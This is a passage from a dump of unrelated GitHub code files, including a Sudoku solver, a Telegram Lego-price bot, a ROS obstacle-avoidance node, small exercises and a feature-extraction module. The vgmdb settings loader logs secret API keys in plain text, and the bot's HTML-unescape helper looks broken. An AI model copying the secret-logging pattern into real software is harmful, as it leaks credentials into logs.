'AMAZON_ASSOCIATE_TAG',\n 'ITUNES_AFFILIATE_ID', 'ITUNES_TD_PROGRAM_ID', 'ITUNES_TD_WEBSITE_ID',\n 'DISCOGS_KEY', 'DISCOGS_SECRET', 'RDIO_KEY', 'RDIO_SECRET',\n 'SPOTIFY_ID', 'SPOTIFY_SECRET'\n]\nfor key in env_keys:\n\tif os.environ.get(key):\n\t\tglobals()[key] = os.environ[key]\n\t\tlogger.info(\"Loading %s from environ: %s\" % (key, os.environ[key]))\n\n# now autoload up some Celery configs\nif 'CELERY_BROKER' not in globals() and 'REDIS_HOST' in globals():\n\tCELERY_BROKER = 'redis://%s:6379/0' % (REDIS_HOST,)\n\nif 'CELERY_RESULT_BACKEND' not in globals() and 'REDIS_HOST' in globals():\n\tCELERY_RESULT_BACKEND = 'redis://%s:6379/0' % (REDIS_HOST,)\n\n# guess the final celery cache string based on the discovered MEMCACHE_SERVERS\nif 'CELERY_CACHE_BACKEND' not in globals() and 'MEMCACHE_SERVERS' in globals():\n\tCELERY_CACHE_BACKEND = 'memcached://%s/' % (';'.join(MEMCACHE_SERVERS), )\n\tlogger.info(\"Guessing Celery cache backend at: %s\" % (CELERY_CACHE_BACKEND,))\n","repo_name":"hufman/vgmdb","sub_path":"vgmdb/autoload_settings.py","file_name":"autoload_settings.py","file_ext":"py","file_size_in_byte":4043,"program_lang":"python","lang":"en","doc_type":"code","stars":93,"dataset":"github-code","pt":"37"} +{"seq_id":"13243516482","text":"\"\"\"\nA Sudoku board holds a matrix of tiles.\nEach row and column and also sub-blocks\nare treated as a group (sometimes called\na 'nonet'); when solved, each group must contain\nexactly one occurrence of each of the\nsymbol choices.\n\"\"\"\nfrom sdk_config import CHOICES, UNKNOWN, ROOT # choices = #, unknown = ., root = num rows in box\nfrom sdk_config import NROWS, NCOLS # nrows = total rows, ncols = total cols\nimport enum\nfrom typing import Sequence, List, Set\n\nimport 
logging\nlogging.basicConfig()\nlog = logging.getLogger(__name__)\nlog.setLevel(logging.DEBUG) # log.setLevel(logging.INFO)\n\n\n\n# --------------------------------\n# The events for MVC\n# --------------------------------\n\nclass Event(object):\n \"\"\"Abstract base class of all events, both for MVC\n and for other purposes.\n \"\"\"\n pass\n# --------------------------------------\n# Events and listeners for Tile objects\n# --------------------------------------\n\nclass EventKind(enum.Enum):\n TileChanged = 1\n TileGuessed = 2\n\n\nclass TileEvent(Event):\n \"\"\"Abstract base class for things that happen\n to tiles. We always indicate the tile. Concrete\n subclasses indicate the nature of the event.\n \"\"\"\n\n def __init__(self, tile: 'Tile', kind: EventKind):\n self.tile = tile\n self.kind = kind\n # Note 'Tile' type is a forward reference;\n # Tile class is defined below\n\n def __str__(self):\n \"\"\"Printed representation includes name of concrete subclass\"\"\"\n return f\"{repr(self.tile)}\"\n\n# ---------------\n# Listeners and Listenable (base class)\n# ---------------\n\nclass Listener(object):\n \"\"\"Abstract base class for listeners.\n Subclass this to make the notification do\n something useful.\n \"\"\"\n\n def __init__(self):\n \"\"\"Default constructor for simple listeners without state\"\"\"\n pass\n\n def notify(self, event: Event):\n \"\"\"The 'notify' method of the base class must be\n overridden in concrete classes.\n \"\"\"\n raise NotImplementedError(\"You must override Listener.notify\")\n\n\nclass Listenable:\n \"\"\"Objects to which listeners (like a view component) can be attached\"\"\"\n\n def __init__(self):\n self.listeners = [ ]\n\n def add_listener(self, listener: Listener):\n self.listeners.append(listener)\n\n def notify_all(self, event: Event):\n for listener in self.listeners:\n listener.notify(event)\n\n\nclass TileListener(Listener):\n def notify(self, event: TileEvent):\n raise NotImplementedError(\n \"TileListener subclass needs to override notify(TileEvent)\")\n\n# ----------------------------------------------\n# Tile class\n# ----------------------------------------------\n\n\nclass Tile(Listenable):\n \"\"\"One tile on the Sudoku grid.\n Public attributes (read-only): value, which will be either\n UNKNOWN or an element of CHOICES; candidates, which will\n be a set drawn from CHOICES. If value is an element of\n CHOICES,then candidates will be the singleton containing\n value. 
If candidates is empty, then no tile value can\n be consistent with other tile values in the grid.\n value is a public read-only attribute; change it\n only through the access method set_value or indirectly\n through method remove_candidates.\n \"\"\"\n\n def __init__(self, row: int, col: int, value=UNKNOWN):\n super().__init__()\n assert value == UNKNOWN or value in CHOICES\n self.row = row\n self.col = col\n self.set_value(value)\n\n def set_value(self, value: str):\n if value in CHOICES:\n self.value = value\n self.candidates = {value}\n else:\n self.value = UNKNOWN\n self.candidates = set(CHOICES)\n self.notify_all(TileEvent(self, EventKind.TileChanged))\n\n def __str__(self) -> str:\n return f\"{self.value}\"\n\n def __repr__(self) -> str:\n return f\"Tile({self.row}, {self.col}, '{self.value}')\"\n\n def could_be(self, value: str) -> bool:\n \"\"\"True iff value is a candidate value for this tile\"\"\"\n return value in self.candidates\n\n def __hash__(self) -> int:\n \"\"\"Hash on position only (not value)\"\"\"\n return hash((self.row, self.col))\n\n def remove_candidates(self, used_values: Set[str]) -> bool:\n \"\"\"The used values cannot be a value of this unknown tile.\n We remove those possibilities from the list of candidates.\n If there is exactly one candidate left, we set the\n value of the tile.\n Returns: True means we eliminated at least one candidate,\n False means nothing changed (none of the 'used_values' was\n in our candidates set).\n \"\"\"\n new_candidates = self.candidates.difference(used_values)\n if new_candidates == self.candidates:\n # Didn't remove any candidates\n return False\n self.candidates = new_candidates\n if len(self.candidates) == 1:\n self.set_value(new_candidates.pop())\n self.notify_all(TileEvent(self, EventKind.TileChanged))\n return True\n\n# ------------------------------\n# Board class\n# ------------------------------\n\nclass Board(object):\n \"\"\"A board has a matrix of tiles\"\"\"\n\n def __init__(self):\n \"\"\"The empty board\"\"\"\n # Row/Column structure: Each row contains columns\n self.tiles: List[List[Tile]] = [ ]\n for row in range(NROWS):\n cols = []\n for col in range(NCOLS):\n cols.append(Tile(row, col))\n self.tiles.append(cols)\n self.groups = []\n\n for row in self.tiles:\n self.groups.append(row)\n\n for col in range(len(self.tiles)):\n new_str = []\n for row in self.tiles:\n new_str.append(row[col])\n self.groups.append(new_str)\n\n for block_row in range(ROOT):\n for block_col in range(ROOT):\n group = []\n for row in range(ROOT):\n for col in range(ROOT):\n row_addr = (ROOT * block_row) + row\n col_addr = (ROOT * block_col) + col\n group.append(self.tiles[row_addr][col_addr])\n self.groups.append(group)\n\n def set_tiles(self, tile_values: Sequence[Sequence[str]] ):\n \"\"\"Set the tile values a list of lists or a list of strings\"\"\"\n for row_num in range(NROWS):\n for col_num in range(NCOLS):\n tile = self.tiles[row_num][col_num]\n tile.set_value(tile_values[row_num][col_num])\n\n def __str__(self) -> str:\n \"\"\"In Sadman Sudoku format\"\"\"\n row_syms = []\n for row in self.tiles:\n values = [tile.value for tile in row]\n row_syms.append(\"\".join(values))\n return \"\\n\".join(row_syms)\n\n def is_consistent(self) -> bool:\n \"\"\"for each group (row, column, or block):\n used symbols = { }\n for each tile in the group:\n if the tile is one of CHOICES (anything but UNKNOWN):\n if the tile's symbol is already in used symbols:\n return False (board is not consistent)\n else:\n add the tile's symbol to the used 
symbols\n        return True (the solved part of the board is ok so far)\n        \"\"\"\n        for group in self.groups:\n            used_symbols = set()\n            for tile in group:\n                if tile.value in CHOICES:\n                    if tile.value in used_symbols:\n                        return False\n                    else:\n                        used_symbols.add(tile.value)\n        return True\n\n    def naked_single(self) -> bool:\n        \"\"\"Eliminate candidates and check for sole remaining possibilities.\n        Return value True means we crossed off at least one candidate.\n        Return value False means we made no progress.\n        \"\"\"\n        value = False\n        for group in self.groups:\n            # collect the symbols already placed in this group ...\n            used_symbols = set()\n            for tile in group:\n                if tile.value in CHOICES:\n                    used_symbols.add(tile.value)\n            # ... and cross them off every unknown tile's candidate set\n            for tile in group:\n                if tile.value not in CHOICES:\n                    change = tile.remove_candidates(used_symbols)\n                    if change is True:\n                        value = True\n        return value\n\n    def hidden_single(self) -> bool:\n        \"\"\"for each group of tiles:\n        leftovers = copy of CHOICES\n        for each tile in group:\n            if tile.value in CHOICES, remove it from leftovers\n        for each value in leftovers:\n            count the number of tiles for which value is a candidate.\n            If the number is 1, then put the value in that tile. \"\"\"\n        choice = False\n        for group in self.groups:\n            leftovers = set(CHOICES)\n            for tile in group:\n                if tile.value in CHOICES:\n                    leftovers.discard(tile.value)\n            for value in leftovers:\n                count = 0\n                for tile in group:\n                    if tile.value not in CHOICES:\n                        if value in tile.candidates:\n                            count += 1\n                            target_tile = tile\n                            if count > 1:\n                                break\n                if count == 1:\n                    target_tile.set_value(value)\n                    choice = True\n        return choice\n\n    def min_choice_tile(self) -> Tile:\n        \"\"\"Returns a tile with value UNKNOWN and\n        minimum number of candidates.\n        Precondition: There is at least one tile\n        with value UNKNOWN.\n        \"\"\"\n        min_candidates = 0\n        for row in self.tiles:\n            for tile in row:\n                if tile.value not in CHOICES:\n                    if min_candidates == 0:\n                        min_candidates = len(tile.candidates)\n                        target_tile = tile\n                    elif len(tile.candidates) < min_candidates:\n                        min_candidates = len(tile.candidates)\n                        target_tile = tile\n        return target_tile\n\n    def as_list(self) -> List[str]:\n        \"\"\"Tile values in a format compatible with\n        set_tiles.\n        \"\"\"\n        row_syms = [ ]\n        for row in self.tiles:\n            values = [tile.value for tile in row]\n            row_syms.append(\"\".join(values))\n        return row_syms\n\n    def is_complete(self) -> bool:\n        \"\"\"None of the tiles are UNKNOWN.\n        Note: Does not check consistency; do that\n        separately with is_consistent.\n        \"\"\"\n        for row in self.tiles:\n            for tile in row:\n                if tile.value not in CHOICES:\n                    return False\n        return True\n\n    def solve(self):\n        \"\"\"General solver; guess-and-check\n        combined with constraint propagation.\n        solve() -> bool:\n            propagate constraints.\n            if board is solved, return True\n            if board is inconsistent, return False\n            otherwise:\n                save the state of the board\n                select a tile to guess values for\n                for each value the tile could hold:\n                    set the tile to that value\n                    if solve():\n                        return True\n                    else:\n                        restore the board to saved state\n            # Tried all the possibilities; none worked\n            return False\n        \"\"\"\n        self.propagate()\n        if self.is_complete():\n            return True\n        if not self.is_consistent():\n            return False\n        board_state = self.as_list()\n        selected_tile = self.min_choice_tile()\n        for value in selected_tile.candidates:\n            selected_tile.set_value(value)\n            if self.solve():\n                return True\n            else:\n                self.set_tiles(board_state)\n        return False\n\n    def propagate(self):\n        \"\"\"Repeat solution 
tactics until we\n don't make any progress, whether or not\n the board is solved.\n \"\"\"\n progress = True\n while progress:\n progress = self.naked_single()\n self.hidden_single()\n return","repo_name":"BriannaV/SudokuSolver","sub_path":"sdk_board.py","file_name":"sdk_board.py","file_ext":"py","file_size_in_byte":12405,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"39435357843","text":"\"\"\"Main module for Ralph's LRS API.\"\"\"\nfrom functools import lru_cache\nfrom urllib.parse import urlparse\n\nimport sentry_sdk\nfrom fastapi import Depends, FastAPI\n\nfrom ralph.conf import settings\n\nfrom .. import __version__\nfrom .auth import get_authenticated_user\nfrom .auth.user import AuthenticatedUser\nfrom .routers import health, statements\n\n\n@lru_cache(maxsize=None)\ndef get_health_check_routes():\n \"\"\"Return the health check routes.\"\"\"\n return [route.path for route in health.router.routes]\n\n\ndef filter_transactions(event, hint): # pylint: disable=unused-argument\n \"\"\"Filter transactions for Sentry.\"\"\"\n url = urlparse(event[\"request\"][\"url\"])\n\n if settings.SENTRY_IGNORE_HEALTH_CHECKS and url.path in get_health_check_routes():\n return None\n\n return event\n\n\nif settings.SENTRY_DSN is not None:\n sentry_sdk.init(\n dsn=settings.SENTRY_DSN,\n traces_sample_rate=settings.SENTRY_LRS_TRACES_SAMPLE_RATE,\n release=__version__,\n environment=settings.EXECUTION_ENVIRONMENT,\n max_breadcrumbs=50,\n before_send_transaction=filter_transactions,\n )\n\napp = FastAPI()\napp.include_router(statements.router)\napp.include_router(health.router)\n\n\n@app.get(\"/whoami\")\nasync def whoami(\n user: AuthenticatedUser = Depends(get_authenticated_user),\n):\n \"\"\"Return the current user's username along with their scopes.\"\"\"\n return {\"agent\": user.agent, \"scopes\": user.scopes}\n","repo_name":"openfun/ralph","sub_path":"src/ralph/api/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1437,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"37"} +{"seq_id":"26613340973","text":"import heapq\n\n\nclass Multiset:\n def __init__(self):\n self.addset = []\n self.delset = []\n\n def add(self, value):\n heapq.heappush(self.addset, value)\n\n def discard(self, value):\n heapq.heappush(self.delset, value)\n\n def smallest(self):\n while self.delset and self.addset[0] == self.delset[0]:\n heapq.heappop(self.addset)\n heapq.heappop(self.delset)\n return self.addset[0]\n\n def is_empty(self):\n return len(self.addset) - len(self.delset) <= 0\n\n\nQ = int(input())\n\nA = Multiset()\nB = Multiset()\ndct = {}\nfor _ in range(Q):\n l = list(input().split())\n\n if l[0] == \"1\":\n x = int(l[1])\n A.add(x)\n B.add(-x)\n dct[x] = dct.setdefault(x, 0) + 1\n\n elif l[0] == \"2\":\n x, c = map(int, l[1:])\n try:\n cnt = dct[x]\n d = min(c, dct[x])\n dct[x] -= d\n\n for _ in range(d):\n A.discard(x)\n B.discard(-x)\n except:\n continue\n\n else:\n # print(A.addset, B.addset, A.delset, B.delset)\n print(abs(B.smallest()) - A.smallest())\n","repo_name":"mei28/Competitive-programing","sub_path":"ABC-253/C.py","file_name":"C.py","file_ext":"py","file_size_in_byte":1145,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"41365906285","text":"panjang = int(input('Masukkan panjang deret: '))\n\nfibonanci = [0,1]\n\nfor i in range(2, panjang):\n angka1 = fibonanci[i - 2]\n angka2 = fibonanci[i - 1]\n 
angka_selanjutnya = angka1 + angka2\n fibonanci.append(angka_selanjutnya)\nprint(fibonanci)","repo_name":"teolloDEV/basic-python","sub_path":"kasus/fibonanci/menggunakan_list.py","file_name":"menggunakan_list.py","file_ext":"py","file_size_in_byte":253,"program_lang":"python","lang":"ms","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"42440577420","text":"print(''''---------------------------\nhallo welkom bij de cluedo try outs.\nWe gaan je vandaag een paar vragen stellen waar je j of n kan beantwoorden.\ndit kan je vertellen welke rol precies bij je past.\n''')\nlijst ='ja','j','yes','y'\nlijstnee ='nee','n','nooit','no','nein'\nlocatie = input('kan je zelf naar de locatie in rotterdam komen?j/n\\n').lower()\nopleiding = input('heb je een mbo niveau 4 opleiding gedaan in acteren.?j/n\\n').lower()\nif opleiding and locatie in lijst:\n gender = input('ben u een man of vrouw?\\n')\n if gender =='man':\n while gender:\n #hierzo ben ik bezig met die kolonel ofso\n militair = input('heb je een militaire achter grond?\\n')\n if militair in lijst:\n gestolen = input(\"heb je ooit iets gestolen? \\n\")\n if gestolen in lijst:\n verdacht = input('heb je ooit iets verdachts gedaan? \\n' )\n if verdacht in lijst:\n print('Je mag op auditie voor de rol van Kolonel van Geelen')\n break\n dominee = input(\"weet je hoe een dominee speelt?\\n\")\n if dominee in lijst:\n rol = input('weet jij hoe je je rol moet spelen\\n')\n if rol in lijst:\n leeftijd3 = input('ben jij ouder dan 40')\n if leeftijd3 in lijst:\n print(\"Je mag op auditie voor de rol van Dominee Groenewoud\")\n break\n pimpel = input('kan jij praten als een professor?\\n')\n if pimpel in lijst:\n doen = input(\"heb je enig idee wat proffesors doen?\\n \")\n if doen in lijst:\n dinosaurussen = input('weet je van dinosaurussen?\\n')\n if dinosaurussen in lijst:\n print('Je mag op auditie voor de rol van Professor Pimpel')\n break\n if gender =='vrouw':\n while gender:\n pruik =input('wil jij een pruik dragen mocht dat nodig zijn? \\n')\n if pruik in lijst:\n getrouwd = input('ben je getrouwd met iemand \\n')\n if getrouwd in lijst:\n leeftijd = input('ben jij ouder dan 40?\\n ')\n if leeftijd in lijst:\n print('Je mag op auditie voor de rol van Mevrouw de Wit\\n')\n break\n #dit is die van rosa\n jaloer = input('ben je snel jaloers?\\n ')\n if jaloer in lijst:\n makeup = input('ben je bereid om make up op te doen?\\n ')\n if makeup in lijst:\n vermoeid = input('ben je snel vermoeid? \\n')\n if vermoeid in lijst:\n print('Je mag op auditie voor de rol van Rosa Roodhart')\n break\n #die van draet\n stoer = input('ben je een echte stoere vrouw?\\n')\n if stoer in lijst:\n feest = input('hou jij van feest?\\n ')\n if feest in lijst:\n chantage = input('herken jij jezelf bij chantage? 
\\n')\n if chantage in lijst:\n print('Je mag op auditie voor de rol van Mevrouw Blaauw van Draet')\n break\n\n \n \n\n\n","repo_name":"Suspious/toets","sub_path":"cluedo.py","file_name":"cluedo.py","file_ext":"py","file_size_in_byte":3338,"program_lang":"python","lang":"nl","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"35373912459","text":"import itertools\nimport re\n\nfrom telegram import InlineKeyboardButton\n\nfrom request_matcher import SET_EXPR\n\nASCII_LOWER = \"abcdefghijklmnopqrstuvwxyz0123456789\"\nOFFSET = ord(\"🇦\") - ord(\"A\")\n\n\ndef formatInfoResponse(message: dict) -> str:\n return u\"\\U0001F170\\uFE0F Name: \" + unescape_html(message[\"name\"]) + \"\\n\" \\\n \"\\U0001F5BC Image: \" + message[\n \"image_url\"] + \"\\n\" \\\n \"\\U0001F4C6 Year released: \" + str(message[\"year_released\"]) + \"\\n\" \\\n \"\\u2693\\uFE0F Weight: \" + str(\n message[\"weight\"]) + \"g\\n\" \\\n \"\\U0001F4D0 Dimensions: \" + str(message[\"dim_x\"]) + \"x\" + str(\n message[\"dim_y\"]) + \"x\" + str(message[\"dim_z\"])\n\n\ndef formatPriceResponse(message: dict) -> str:\n return u\"Price for \" + message[\"item\"][\"no\"] + \" (\" + message[\"new_or_used\"] + \")\" + \"\\n\" \\\n \"\\U0001F4C9 Minimal price: \" + message[\"min_price\"] + unescape_html(message[\"currency_code\"]) + \"\\n\" \\\n \"\\U0001F4C6 Maximal price: \" + message[\"max_price\"] + unescape_html(message[\"currency_code\"]) + \"\\n\" \\\n \"\\U0001F4CA Average price: \" + message[\"avg_price\"] + unescape_html(message[\"currency_code\"]) + \"\\n\" \\\n \"\\U0001F522 Quantity for sale: \" + str(message[\"total_quantity\"])\n\n\ndef formatItemsSoldResponse(message: dict) -> str:\n if len(message[\"price_detail\"]) > 0:\n res = u\"Recently sold \" + message[\"item\"][\"no\"] + \" (\" + message[\"new_or_used\"] + \"):\"\n for item in itertools.islice(message[\"price_detail\"], 20):\n res += \"\\nSeller: \" + resolve_flag_emoji(item[\"seller_country_code\"]) + \\\n \", Buyer: \" + resolve_flag_emoji(item[\"buyer_country_code\"]) + \\\n \", Price: \" + item[\"unit_price\"] + \" \" + unescape_html(message[\"currency_code\"]) + \\\n \", Quantity: \" + str(item[\"quantity\"])\n else:\n res = \"Seems like no \" + message[\"item\"][\"no\"] + \" were sold recently \\U0001F914\"\n return res\n\n\ndef formatItemsForSaleResponse(message: dict) -> str:\n if len(message[\"price_detail\"]) > 0:\n res = message[\"item\"][\"no\"] + \" for sale (\" + message[\"new_or_used\"] + \"):\"\n for item in itertools.islice(message[\"price_detail\"], 20):\n res += u\"\\n\\U0001F4B5 Price: \" + item[\"unit_price\"] + unescape_html(message[\"currency_code\"]) +\\\n \", \\U0001F522 Quantity: \" + str(item[\"quantity\"]) + \\\n \", \\U0001F69A Ships to \" + resolve_flag_emoji(\"ua\") + \": \" + \\\n (u\"\\u2705\" if item[\"shipping_available\"] else u\"\\u274C\")\n else:\n res = \"Seems like \" + message[\"item\"][\"no\"] + \" is out of stock \\U0001F914\"\n return res\n\n\ndef unescape_html(s: str):\n s = s.replace(\"(\", \"(\")\n s = s.replace(\")\", \")\")\n s = s.replace(\"<\", \"<\")\n s = s.replace(\">\", \">\")\n s = s.replace(\"'\", \"'\")\n # this has to be last:\n s = s.replace(\"&\", \"&\")\n return s\n\n\ndef resolve_flag_emoji(countrycode: str) -> str:\n if countrycode == \"UK\":\n return u\"\\U0001F1EC\\U0001F1E7\"\n elif countrycode == \"RU\":\n return u\"\\U0001F4A9\"\n code = [c for c in countrycode.lower() if c in ASCII_LOWER]\n return \"\".join([chr(ord(c.upper()) + OFFSET) for c in code])\n\n\ndef 
search_response_formatter(message: dict, target: str):\n keyboard = []\n sets = list(filter(lambda x: re.search(SET_EXPR, x[\"set_num\"]), message[\"results\"]))\n if len(sets) > 0:\n sets = sorted(sets, key=lambda k: k['year'], reverse=True)\n for item in itertools.islice(sets, 20):\n keyboard.append([\n InlineKeyboardButton(\n item[\"set_num\"] + \" - \" + unescape_html(item[\"name\"]) + \" (\" + str(item[\"year\"]) + \")\",\n callback_data=target + \" \" + item[\"set_num\"])])\n return keyboard\n","repo_name":"vdubchak/BricklinkerPy","sub_path":"bricklink_telegram_bot/response_formatters.py","file_name":"response_formatters.py","file_ext":"py","file_size_in_byte":3959,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"17896638067","text":"n = int(input())\nnums = list(map(int, input().split()))\nsum = 1\nflag = 1\nupper = pow(10, 18)\nfor num in nums:\n if flag == 1:\n sum = sum * num\n if sum > upper:\n flag = 2\n if num == 0:\n flag = 0\n break\nif flag == 2:\n print(-1)\nelse:\n print(sum * flag)\n","repo_name":"tssstkk/atcoder","sub_path":"ABC/169/b.py","file_name":"b.py","file_ext":"py","file_size_in_byte":271,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"28296974370","text":"\nfrom typing import Union\n\n\nclass Account(object):\n\n ID_COUNT = 1\n\n def __init__(self, name, **kwargs):\n self.id = self.ID_COUNT\n self.name = name\n self.__dict__.update(kwargs)\n if not hasattr(self, 'value'):\n self.value = 0\n Account.ID_COUNT += 1\n \n def transfer(self, amount):\n self.value += amount\n\n\n\nclass Bank:\n \"\"\"The bank\"\"\"\n def __init__(self):\n self.account = []\n\n def add(self, account):\n if type(account) is not Account:\n raise TypeError(\"account must be an instance of Account\")\n if self.is_corrupted(account):\n raise Exception(\"account is corrupted\")\n\n self.account.append(account)\n\n def transfer(self, origin, dest, amount):\n \"\"\"\n @origin: int(id) or str(name) of the first account\n @dest: int(id) or str(name) of the destination account\n @amount: float(amount) amount to transfer\n @return True if success, False if an error occured\n \"\"\"\n\n try:\n origin_acc = self._get_account(origin)\n dest_acc = self._get_account(dest)\n except Exception:\n return False\n\n if self.is_corrupted(origin_acc) or self.is_corrupted(dest_acc):\n return False\n\n if origin_acc.value < amount:\n return False\n\n origin_acc.transfer(-amount)\n dest_acc.transfer(amount)\n\n return True\n\n def fix_account(self, account):\n \"\"\"\n fix the corrupted account\n @account: int(id) or str(name) of the account\n @return True if success, False if an error occured\n \"\"\"\n try:\n acc = self._get_account(account)\n except Exception:\n return False\n\n acc.value = 0\n\n def is_corrupted(self, account: Account) -> bool:\n attributes = dir(account)\n\n return len(attributes) % 2 == 0 \\\n and any(a for a in attributes if a.startswith(\"b\"))\\\n and not any(a for a in attributes if a.startswith(\"zip\") or a.startswith(\"addr\"))\\\n and \"name\" not in attributes\\\n and \"id\" not in attributes\\\n and \"value\" not in attributes\n\n def _get_account(self, account: Union[str, int]):\n if type(account) is int:\n return self.account[account]\n elif type(account) is str:\n return next(acc for acc in self.account if acc.name == account)\n else:\n raise 
TypeError()","repo_name":"Yanis-F/42ai-bootcamp-python","sub_path":"module01/ex06/the_bank.py","file_name":"the_bank.py","file_ext":"py","file_size_in_byte":2528,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"6473138879","text":"#! /usr/bin/env python\n\nimport rospy\nfrom sensor_msgs.msg import LaserScan \nfrom geometry_msgs.msg import Twist\n\nturn_velocity = 0.9\nlinear_velocity = 1.\nfirst_turn_distance = 1\nsecond_turn_distance = 0.4\n\ndef callback(msg): \n    #print msg.ranges[360] #We print the distance to an obstacle in front of the robot\n\n#If the distance to an obstacle in front of the robot is bigger than 1 meter, the robot will move forward\n    if msg.ranges[360] > first_turn_distance:\n        move.linear.x = linear_velocity\n        move.angular.z = 0.0\n\n#If the distance to an obstacle in front of the robot is smaller than 1 meter, the robot will turn left\n    if msg.ranges[360] < 1: \n        move.linear.x = linear_velocity/10.\n        move.angular.z = turn_velocity\n    \n#If the distance to an obstacle at the left side of the robot is smaller than 0.3 meters, the robot will turn right\n    if msg.ranges[719] < second_turn_distance:\n        move.linear.x = linear_velocity/10.\n        move.angular.z = -turn_velocity\n    \n#If the distance to an obstacle at the right side of the robot is smaller than 0.3 meters, the robot will turn left\n    if msg.ranges[0] < second_turn_distance:\n        move.linear.x = linear_velocity/10.\n        move.angular.z = turn_velocity\n    \n    pub.publish(move)\n\nrospy.init_node('sub_node')\nsub = rospy.Subscriber('/kobuki/laser/scan', LaserScan, callback) #We subscribe to the laser's topic\npub = rospy.Publisher('/cmd_vel', Twist)\nmove = Twist()\n\nrospy.spin()","repo_name":"darienmt/ros_ignite_academy_ros_in_5_days","sub_path":"src/topics_mini_project/src/mini_project.py","file_name":"mini_project.py","file_ext":"py","file_size_in_byte":1461,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"37"}
{"seq_id":"34102607626","text":"from functools import partial\nfrom collections import defaultdict\nimport pandas as pd\nimport numpy as np\nimport tqdm\n\nPERCENTILES = (10, 33, 66, 90, 95)\nHIGH_LEVEL_STATS = (np.min, np.max, np.sum, np.std, np.mean, np.median)\nOUTLIERS_THRESHOLDS = (500, 5000, 10000, 30000, 50000, 100000, 1000000)\n\nIMPORTANT_GROUPS = (0, 1, 2, 3, 4, 5, 7, 8, 9, 11, 12, 13, 14, 15, 16, 18, 147, 20, 21, 23, 24, 25, 26, 151, 28, 29,\n                    31, 32, 34, 35, 36, 37, 39, 43, 44, 46, 50, 55, 57, 59, 61, 64, 69, 80, 81, 82, 105, 109, 110, 112, 123)\n\n\nSEQ_LENGTH = 730\nNULL_GROUP_ID = 204\n\n\ndef convert_dates(dates, output=None):\n    if output == 'day_of_week':\n        return dates % 7\n    if output == 'month':\n        return (dates // 30) % 12\n    if output == 'quarter':\n        return (dates // 90) % 4\n    return dates\n\n\ndef get_important_groups(train_data, top_k=30):\n    important_groups = set()\n    for fa in (np.size, np.max, np.sum):\n        group_index = (\n            train_data\n            .groupby('small_group').amount_rur.agg(fa)\n            .sort_values(ascending=False)\n            .iloc[:top_k].index.tolist()\n        )\n        important_groups.update(group_index)\n    return list(important_groups)\n\n\nclass GlobalClientFeaturesExtractor:\n    \n    AGG_LEVELS = (('month', 30, 25), ('quarter', 90, 9))\n    \n    def __init__(self, cfg=None):\n        self._cfg = cfg\n    \n    def extract(self, transactions):\n        n = transactions.shape[0]\n        features = []\n        \n        ############################################\n        # Dates ####################################\n        ############################################\n        
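# Illustrative values for convert_dates above (day index 45; assumes\n        # trans_date counts days from the start of the observation window):\n        #   convert_dates(45, 'day_of_week') -> 45 % 7 == 3\n        #   convert_dates(45, 'month') -> (45 // 30) % 12 == 1\n        #   convert_dates(45, 'quarter') -> (45 // 90) % 4 == 0\n        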
#print('Dates features extraction...')\n        t_dates = transactions.trans_date\n        \n        unique_dates = t_dates.nunique()\n        period_length = t_dates.max() - t_dates.min() + 1\n        \n        # fraction of transactions for a week day\n        dow_dates = convert_dates(t_dates, 'day_of_week')\n        week_day_fracs = np.array([(dow_dates == day_of_week).sum() / n for day_of_week in range(7)])\n        # fraction of transactions for a month\n        m_dates = convert_dates(t_dates, 'month')\n        month_fracs = np.array([(m_dates == month).sum() / n for month in range(12)])\n        # fraction of transactions for a quarter\n        q_dates = convert_dates(t_dates, 'quarter')\n        quarter_fracs = np.array([(q_dates == quarter).sum() / n for quarter in range(4)])\n        transactions_per_day_info = transactions.groupby('trans_date').trans_date.count().describe()\n        \n        features.extend([\n            period_length,\n            unique_dates / period_length, # prob of [>=1] transactions for a given day\n            *list(week_day_fracs), week_day_fracs.mean(), week_day_fracs.std(), week_day_fracs.min(), week_day_fracs.max(),\n            *list(month_fracs), month_fracs.mean(), month_fracs.std(), month_fracs.min(), month_fracs.max(),\n            *list(quarter_fracs), quarter_fracs.mean(), quarter_fracs.std(), quarter_fracs.min(), quarter_fracs.max(),\n            *list(transactions_per_day_info)\n        ])\n        \n        ############################################\n        # Money ####################################\n        ############################################\n        #print('Money features extraction...')\n        money = transactions.amount_rur\n        \n        week_day_money_stats = np.array([list(money[dow_dates == day_of_week].describe()) for day_of_week in range(7)]).ravel()\n        month_money_stats = np.array([list(money[m_dates == month].describe()) for month in range(12)]).ravel()\n        quarter_money_stats = np.array([list(money[q_dates == quarter].describe()) for quarter in range(4)]).ravel()\n        \n        agg_features = []\n        for name, duration, n_buckets in self.AGG_LEVELS:\n            #print(f'Money features, agg level: {name}')\n            buckets = transactions.assign(bucket_id = transactions.trans_date // duration)\n            buckets_values = defaultdict(list)\n            for bucket_id in range(n_buckets):\n                bucket_df = buckets.query(f'bucket_id == {bucket_id}')\n                bucket_money = bucket_df.amount_rur.values\n                for fa in HIGH_LEVEL_STATS:\n                    #print(fa.__name__)\n                    value = fa(bucket_money) if not bucket_df.empty else 0\n                    agg_features.append(value)\n                    buckets_values[fa.__name__].append(value)\n            for fa in HIGH_LEVEL_STATS:\n                values = np.array(buckets_values[fa.__name__])\n                for fb in HIGH_LEVEL_STATS:\n                    agg_features.append(fb(values))\n        \n        # Outliers\n        outliers_features = []\n        for threshold in OUTLIERS_THRESHOLDS:\n            #print(f'Outliers threshold: {threshold}')\n            outliers = transactions.assign(is_outlier = transactions.amount_rur > threshold)\n            for fa in (np.min, np.max, np.sum):\n                outliers_features.append(fa(outliers.is_outlier))\n                outliers_features.append(fa(outliers.query('is_outlier == True').amount_rur))\n        \n        features.extend([\n            *list(money.describe()), *list(week_day_money_stats), *list(month_money_stats), *list(quarter_money_stats),\n            